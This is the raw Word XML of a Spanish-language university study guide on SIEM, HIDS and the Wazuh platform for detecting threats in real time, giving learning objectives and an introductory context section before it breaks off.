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121D" w14:paraId="2F3C69A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100" w:type="dxa"/>
              <w:left w:w="150" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:right w:w="150" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="2F3C69A0" w14:textId="634710BA" w:rsidR="009E121D" w:rsidRDefault="008F63DC">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3859A9EE" wp14:editId="62D8DAB0">
                  <wp:extent cx="1869743" cy="1869743"/>
                  <wp:effectExtent l="0" t="0" r="0" b="0"/>
                  <wp:docPr id="1" name="udg" descr="Escudo UDG" title="UD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74823" cy="1874823"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                        </pic:spPr>
                      </pic:pic>
                    </a:graphicData>
                  </a:graphic>
                </wp:inline>
              </w:drawing>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="2F3C69A2" w14:textId="77777777" w:rsidR="009E121D" w:rsidRDefault="009E121D">
      <w:pPr>
        <w:spacing w:before="80"/>
      </w:pPr>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:w="9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2"/>
        <w:gridCol w:w="2341"/>
        <w:gridCol w:w="2341"/>
        <w:gridCol w:w="2341"/>
      </w:tblGrid>
      <w:tr w:rsidR="00BF474E" w:rsidRPr="00BF474E" w14:paraId="14DD9E35" w14:textId="77777777" w:rsidTr="00D53F6E">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:gridSpan w:val="4"/>
            <w:tcBorders>
              <w:top w:val="none" w:sz="0" w:space="0" w:color="FFFFFF"/>
              <w:left w:val="none" w:sz="0" w:space="0" w:color="FFFFFF"/>
              <w:bottom w:val="none" w:sz="0" w:space="0" w:color="FFFFFF"/>
              <w:right w:val="none" w:sz="0" w:space="0" w:color="FFFFFF"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:left w:w="150" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:right w:w="150" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="2C029D1C" w14:textId="77777777" w:rsidR="00BF474E" w:rsidRDefault="00BF474E" w:rsidP="00D53F6E">
            <w:pPr>
              <w:spacing w:before="120" w:after="80"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="1F4E79"/>
                <w:sz w:val="48"/>
                <w:szCs w:val="48"/>
                <w:lang w:val="es-MX"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005E4D8F">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="1F4E79"/>
                <w:sz w:val="48"/>
                <w:szCs w:val="48"/>
                <w:lang w:val="es-MX"/>
              </w:rPr>
              <w:t>GUÍA DE ESTUDIO</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7B5206D9" w14:textId="0A57B3DA" w:rsidR="00BF474E" w:rsidRPr="00BF474E" w:rsidRDefault="00BF474E" w:rsidP="00D53F6E">
            <w:pPr>
              <w:pBdr>
                <w:bottom w:val="single" w:sz="8" w:space="0" w:color="2E5A8A"/>
              </w:pBdr>
              <w:spacing w:after="200"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:lang w:val="es-MX"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00BF474E">
              <w:rPr>
                <w:i/>
                <w:iCs/>
                <w:color w:val="2E74B5"/>
                <w:sz w:val="26"/>
                <w:szCs w:val="26"/>
                <w:lang w:val="es-MX"/>
              </w:rPr>
              <w:t>SIEM, HIDS y Wazuh: Detecci</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:i/>
                <w:iCs/>
                <w:color w:val="2E74B5"/>
                <w:sz w:val="26"/>
                <w:szCs w:val="26"/>
                <w:lang w:val="es-MX"/>
              </w:rPr>
              <w:t>ón de Amenazas en Tiempo Real</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BF474E" w14:paraId="5EC77FB7" w14:textId="77777777" w:rsidTr="00D53F6E">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2342" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="150B15F9" w14:textId="77777777" w:rsidR="00BF474E" w:rsidRDefault="00BF474E" w:rsidP="00D53F6E">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000000"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>UNIDAD</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2341" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="6556A634" w14:textId="77777777" w:rsidR="00BF474E" w:rsidRDefault="00BF474E" w:rsidP="00D53F6E">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000000"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>SESIÓN</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2341" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="4833144C" w14:textId="77777777" w:rsidR="00BF474E" w:rsidRDefault="00BF474E" w:rsidP="00D53F6E">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000000"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>TIPO</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2341" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="6A9E87AA" w14:textId="77777777" w:rsidR="00BF474E" w:rsidRDefault="00BF474E" w:rsidP="00D53F6E">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000000"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>NIVEL</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BF474E" w14:paraId="2AF4694C" w14:textId="77777777" w:rsidTr="00D53F6E">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2342" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="267B6C18" w14:textId="77777777" w:rsidR="00BF474E" w:rsidRDefault="00BF474E" w:rsidP="00D53F6E">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>2</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2341" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="67EE9BAC" w14:textId="286C196B" w:rsidR="00BF474E" w:rsidRDefault="00BF474E" w:rsidP="00D53F6E">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:t>7</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2341" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="47D71636" w14:textId="77777777" w:rsidR="00BF474E" w:rsidRDefault="00BF474E" w:rsidP="00D53F6E">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>ESTUDIO</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2341" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="217BF1B5" w14:textId="77777777" w:rsidR="00BF474E" w:rsidRDefault="00BF474E" w:rsidP="00D53F6E">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>AVANZADO</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="7D785974" w14:textId="77777777" w:rsidR="00BF474E" w:rsidRDefault="00BF474E" w:rsidP="00BF474E">
      <w:pPr>
        <w:spacing w:after="100"/>
        <w:rPr>
          <w:lang w:val="es-MX"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="32E982AD" w14:textId="77777777" w:rsidR="00683736" w:rsidRPr="009A062F" w:rsidRDefault="00683736" w:rsidP="00683736">
      <w:pPr>
        <w:spacing w:before="60" w:after="60"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:lang w:val="es-MX"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009A062F">
        <w:rPr>
          <w:color w:val="444444"/>
          <w:lang w:val="es-MX"/>
        </w:rPr>
        <w:t>CUGDL - Universidad de Guadalajara</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4346E87C" w14:textId="77777777" w:rsidR="00683736" w:rsidRPr="00417643" w:rsidRDefault="00683736" w:rsidP="00683736">
      <w:pPr>
        <w:spacing w:before="60" w:after="60"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:lang w:val="es-MX"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00417643">
        <w:rPr>
          <w:color w:val="444444"/>
          <w:lang w:val="es-MX"/>
        </w:rPr>
        <w:t>Arquitectura de Sistemas de Seguridad</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1251BB62" w14:textId="77777777" w:rsidR="00683736" w:rsidRPr="00417643" w:rsidRDefault="00683736" w:rsidP="00683736">
      <w:pPr>
        <w:spacing w:before="60" w:after="60"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:lang w:val="es-MX"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00417643">
        <w:rPr>
          <w:color w:val="444444"/>
          <w:lang w:val="es-MX"/>
        </w:rPr>
        <w:t>Licenciatura en Ciberseguridad</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="648E6C60" w14:textId="77777777" w:rsidR="00683736" w:rsidRPr="00417643" w:rsidRDefault="00683736" w:rsidP="00683736">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:rPr>
          <w:lang w:val="es-MX"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="46E08D8B" w14:textId="77777777" w:rsidR="00683736" w:rsidRPr="00417643" w:rsidRDefault="00683736" w:rsidP="00683736">
      <w:pPr>
        <w:spacing w:before="60" w:after="60"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:lang w:val="es-MX"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00417643">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="es-MX"/>
        </w:rPr>
        <w:t>Autor: Carlos Pulido Rosas</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FA2F233" w14:textId="77777777" w:rsidR="00683736" w:rsidRPr="00417643" w:rsidRDefault="00683736" w:rsidP="00683736">
      <w:pPr>
        <w:spacing w:before="60" w:after="60"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:lang w:val="es-MX"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="555555"/>
          <w:lang w:val="es-MX"/>
        </w:rPr>
        <w:t>Abril</w:t>
      </w:r>
      <w:r w:rsidRPr="00417643">
        <w:rPr>
          <w:color w:val="555555"/>
          <w:lang w:val="es-MX"/>
        </w:rPr>
        <w:t xml:space="preserve"> 2026</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="480B915C" w14:textId="77777777" w:rsidR="00683736" w:rsidRDefault="00683736">
      <w:pPr>
        <w:spacing w:before="80"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="34F4EB09" w14:textId="77777777" w:rsidR="00683736" w:rsidRDefault="0068373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121D" w14:paraId="2F3C69B7" w14:textId="77777777">
        <w:tblPrEx>
          <w:tblCellMar>
            <w:top w:w="0" w:type="dxa"/>
            <w:bottom w:w="0" w:type="dxa"/>
          </w:tblCellMar>
        </w:tblPrEx>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2F3C69B6" w14:textId="43B78805" w:rsidR="009E121D" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>OBJETIVOS DE APRENDIZAJE</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="009E121D" w:rsidRPr="003C1812" w14:paraId="2F3C69BE" w14:textId="77777777">
        <w:tblPrEx>
          <w:tblCellMar>
            <w:top w:w="0" w:type="dxa"/>
            <w:bottom w:w="0" w:type="dxa"/>
          </w:tblCellMar>
        </w:tblPrEx>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="1" w:space="0" w:color="1F4E79"/>
              <w:left w:val="single" w:sz="1" w:space="0" w:color="1F4E79"/>
              <w:bottom w:val="single" w:sz="1" w:space="0" w:color="1F4E79"/>
              <w:right w:val="single" w:sz="1" w:space="0" w:color="1F4E79"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="F7FBFF"/>
            <w:tcMar>
              <w:top w:w="120" w:type="dxa"/>
              <w:left w:w="180" w:type="dxa"/>
              <w:bottom w:w="120" w:type="dxa"/>
              <w:right w:w="180" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="2F3C69B8" w14:textId="77777777" w:rsidR="009E121D" w:rsidRPr="003C1812" w:rsidRDefault="00000000">
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="2"/>
              </w:numPr>
              <w:spacing w:before="60" w:after="60"/>
              <w:rPr>
                <w:lang w:val="es-MX"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003C1812">
              <w:rPr>
                <w:lang w:val="es-MX"/>
              </w:rPr>
              <w:t>Explicar qué es un SIEM y cómo transforma eventos individuales dispersos en incidentes accionables con contexto completo.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2F3C69B9" w14:textId="77777777" w:rsidR="009E121D" w:rsidRPr="003C1812" w:rsidRDefault="00000000">
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="2"/>
              </w:numPr>
              <w:spacing w:before="60" w:after="60"/>
              <w:rPr>
                <w:lang w:val="es-MX"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003C1812">
              <w:rPr>
                <w:lang w:val="es-MX"/>
              </w:rPr>
              <w:t>Distinguir HIDS de NIDS y describir qué detecta cada uno, con énfasis en por qué el HIDS ve lo que el NIDS no puede ver en tráfico cifrado.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2F3C69BA" w14:textId="77777777" w:rsidR="009E121D" w:rsidRPr="003C1812" w:rsidRDefault="00000000">
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="2"/>
              </w:numPr>
              <w:spacing w:before="60" w:after="60"/>
              <w:rPr>
                <w:lang w:val="es-MX"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003C1812">
              <w:rPr>
                <w:lang w:val="es-MX"/>
              </w:rPr>
              <w:t>Describir la arquitectura Manager-Agent de Wazuh y explicar qué hace cada componente en el modelo de detección.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2F3C69BB" w14:textId="77777777" w:rsidR="009E121D" w:rsidRPr="003C1812" w:rsidRDefault="00000000">
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="2"/>
              </w:numPr>
              <w:spacing w:before="60" w:after="60"/>
              <w:rPr>
                <w:lang w:val="es-MX"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003C1812">
              <w:rPr>
                <w:lang w:val="es-MX"/>
              </w:rPr>
              <w:t>Identificar las cuatro capacidades principales de Wazuh: FIM, detección de intrusos, compliance y respuesta activa.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2F3C69BC" w14:textId="77777777" w:rsidR="009E121D" w:rsidRPr="003C1812" w:rsidRDefault="00000000">
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="2"/>
              </w:numPr>
              <w:spacing w:before="60" w:after="60"/>
              <w:rPr>
                <w:lang w:val="es-MX"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003C1812">
              <w:rPr>
                <w:lang w:val="es-MX"/>
              </w:rPr>
              <w:t>Interpretar una alerta de Wazuh — leer su estructura, entender su Rule ID, nivel de severidad y mapeo MITRE ATT&amp;CK.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2F3C69BD" w14:textId="77777777" w:rsidR="009E121D" w:rsidRPr="003C1812" w:rsidRDefault="00000000">
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="2"/>
              </w:numPr>
              <w:spacing w:before="60" w:after="60"/>
              <w:rPr>
                <w:lang w:val="es-MX"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003C1812">
              <w:rPr>
                <w:lang w:val="es-MX"/>
              </w:rPr>
              <w:t>Conectar los conceptos de SIEM y HIDS con los principios de Defensa en Profundidad vistos en la Unidad 1.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="2F3C69BF" w14:textId="77777777" w:rsidR="009E121D" w:rsidRPr="003C1812" w:rsidRDefault="009E121D">
      <w:pPr>
        <w:spacing w:before="12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5"/>
        <w:gridCol w:w="8675"/>
      </w:tblGrid>
      <w:tr w:rsidR="009E121D" w:rsidRPr="003C1812" w14:paraId="2F3C69C5" w14:textId="77777777">
        <w:tblPrEx>
          <w:tblCellMar>
            <w:top w:w="0" w:type="dxa"/>
            <w:bottom w:w="0" w:type="dxa"/>
          </w:tblCellMar>
        </w:tblPrEx>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="400" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="1" w:space="0" w:color="2E74B5"/>
              <w:left w:val="single" w:sz="1" w:space="0" w:color="2E74B5"/>
              <w:bottom w:val="single" w:sz="1" w:space="0" w:color="2E74B5"/>
              <w:right w:val="single" w:sz="1" w:space="0" w:color="2E74B5"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="2E74B5"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:left w:w="150" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:right w:w="150" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="2F3C69C0" w14:textId="77777777" w:rsidR="009E121D" w:rsidRDefault="00000000">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:t>📖</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8960" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="1" w:space="0" w:color="2E74B5"/>
              <w:left w:val="single" w:sz="1" w:space="0" w:color="2E74B5"/>
              <w:bottom w:val="single" w:sz="1" w:space="0" w:color="2E74B5"/>
              <w:right w:val="single" w:sz="1" w:space="0" w:color="2E74B5"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="D5E8F0"/>
            <w:tcMar>
              <w:top w:w="120" w:type="dxa"/>
              <w:left w:w="180" w:type="dxa"/>
              <w:bottom w:w="120" w:type="dxa"/>
              <w:right w:w="180" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="2F3C69C1" w14:textId="77777777" w:rsidR="009E121D" w:rsidRPr="003C1812" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:after="80"/>
              <w:rPr>
                <w:lang w:val="es-MX"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003C1812">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="1F4E79"/>
                <w:lang w:val="es-MX"/>
              </w:rPr>
              <w:t>CONTEXTO</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2F3C69C2" w14:textId="77777777" w:rsidR="009E121D" w:rsidRPr="003C1812" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
              <w:rPr>
                <w:lang w:val="es-MX"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003C1812">
              <w:rPr>
                <w:lang w:val="es-MX"/>
              </w:rPr>
              <w:t>En la Sesión 6 aprendiste que el IDS/IPS detecta ataques comparando tráfico con firmas conocidas. Pero existe un problema fundamental: cuando el tráfico está cifrado — con TLS, VPN o SSH — el sensor de red no puede ver el contenido. El atacante moderno sabe esto y usa cifrado para esconderse.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2F3C69C3" w14:textId="77777777" w:rsidR="009E121D" w:rsidRPr="003C1812" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
              <w:rPr>
                <w:lang w:val="es-MX"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003C1812">
              <w:rPr>
                <w:lang w:val="es-MX"/>
              </w:rPr>
              <w:t>El HIDS (Host Intrusion Detection System) resuelve exactamente ese problema: en lugar de mirar el cable, mira lo que ocurre dentro del host — después de que el sistema operativo descifra el tráfico. Y el SIEM une todo: recibe eventos de todos los sensores, los correlaciona y transforma el ruido en incidentes accionables.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2F3C69C4" w14:textId="77777777" w:rsidR="009E121D" w:rsidRPr="003C1812" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
              <w:rPr>
                <w:lang w:val="es-MX"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003C1812">
              <w:rPr>
                <w:lang w:val="es-MX"/>
              </w:rPr>
              <w:t>Wazuh es la herramienta que implementa ambos conceptos en una sola plataforma open source. Esta guía te prepara para usarlo en el laboratorio de esta sesión.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="2F3C69C6" w14:textId="77777777" w:rsidR="009E121D" w:rsidRPr="003C1812" w:rsidRDefault="009E121D">
      <w:pPr>
        <w:spacing w:before="120"/>
        <w:rPr>
          <w:lang w:val="es-MX"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2F3C69C7" w14:textId="77777777" w:rsidR="009E121D" w:rsidRPr="003C1812" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:rPr>
          <w:lang w:val="es-MX"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003C1812">
        <w:rPr>
          <w:lang w:val="es-MX"/>
        </w:rPr>
        <w:t>1. El problema que SIEM y HIDS resuelven</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F3C69C8" w14:textId="77777777" w:rsidR="009E121D" w:rsidRPr="003C1812" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="60" w:after="60"/>
        <w:rPr>
          <w:lang w:val="es-MX"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003C1812">
        <w:rPr>
          <w:color w:val="000000"/>
          <w:lang w:val="es-MX"/>
        </w:rPr>
        <w:t>Imagina un equipo de seguridad en una empresa mediana. Tienen un firewall NGFW, un IDS de red, cinco servidores Linux, dos servidores Windows, una base de datos y un servidor web. Cada dispositivo genera logs de forma independiente. Al final del día tienen:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F3C69C9" w14:textId="77777777" w:rsidR="009E121D" w:rsidRPr="003C1812" w:rsidRDefault="009E121D">
      <w:pPr>
        <w:spacing w:before="6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121D" w:rsidRPr="003C1812" w14:paraId="2F3C69D1" w14:textId="77777777">
        <w:tblPrEx>
          <w:tblCellMar>
            <w:top w:w="0" w:type="dxa"/>
            <w:bottom w:w="0" w:type="dxa"/>
          </w:tblCellMar>
        </w:tblPrEx>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="1" w:space="0" w:color="2E74B5"/>
              <w:left w:val="single" w:sz="1" w:space="0" w:color="2E74B5"/>
              <w:bottom w:val="single" w:sz="1" w:space="0" w:color="2E74B5"/>
              <w:right w:val="single" w:sz="1" w:space="0" w:color="2E74B5"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="EBF3FB"/>
            <w:tcMar>
              <w:top w:w="120" w:type="dxa"/>
              <w:left w:w="180" w:type="dxa"/>
              <w:bottom w:w="120" w:type="dxa"/>
              <w:right w:w="180" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="2F3C69CA" w14:textId="77777777" w:rsidR="009E121D" w:rsidRPr="003C1812" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:after="80"/>
              <w:rPr>
                <w:lang w:val="es-MX"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003C1812">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="1F4E79"/>
                <w:lang w:val="es-MX"/>
              </w:rPr>
              <w:t>El problema del volumen y la fragmentación de logs</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2F3C69CB" w14:textId="77777777" w:rsidR="009E121D" w:rsidRPr="003C1812" w:rsidRDefault="00000000">
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
